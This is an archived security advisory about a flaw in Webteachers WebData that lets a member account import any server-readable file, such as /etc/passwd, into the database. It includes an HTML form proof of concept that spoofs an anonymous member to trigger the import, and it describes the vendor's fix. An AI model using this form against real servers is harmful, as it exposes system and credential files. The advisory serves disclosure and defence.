TUCoPS :: Web :: Servers :: webdata1.htm

WebData - import any file
Vulnerability

    WebData

Affected

    Webteachers WebData

Description

    Following  is  based  on  a  Delphis  Consulting Security Advisory
    DST2K0039.   Delphis  Consulting  Internet  Security  Team (DCIST)
    discovered  the  following  vulnerability  in  WebData under Linux
    (although  not  tested  under  WindowsNT  we would expect the same
    results).

    It is possible to import any file (i.e. /etc/passwd) from the file
    system which the Webserver user (i.e. nobody) has access to in  to
    the WebData  database.   This enables  potenial attackers  to gain
    access to the contents of a number of key files (i.e.  hosts.allow
    / hosts.deny .etc) by browsing the database afterwards.  Note: You
    need at least a member account to perform this action.

    The below script won't just  work but will require a  little brain
    power to get working with your  database.  This enables a user  to
    import anonymously any file that the web user has access to.

    Example script:

        <form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
        <INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
        <font size=3>Is the file comma or tab delimited?</font></B>
        <select name="delimiter" size=1>
        <option value="comma">comma
        <option value="tab">tab
        <option value="pipe">pipe
        </select>
        <INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
        <input type=hidden name="cgifunction" value="import2">
        <BR>
        <INPUT TYPE=SUBMIT VALUE="Import">
        </form>

Solution

    A new version of Webdata has been released.  The security  problem
    is addressed in the new version in the following manner.

    Only  the  admin  can  use  the  "filename"  method  of importing.
    Members must use the file upload  method.  The "enter the path  to
    the file" box does not appear on the import screen when the userid
    is not  "admin".   The program  also checks  the userid during the
    actual  importing,  so  a  hacker   could  not  simply  type   the
    querystring for a file import into the location box.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH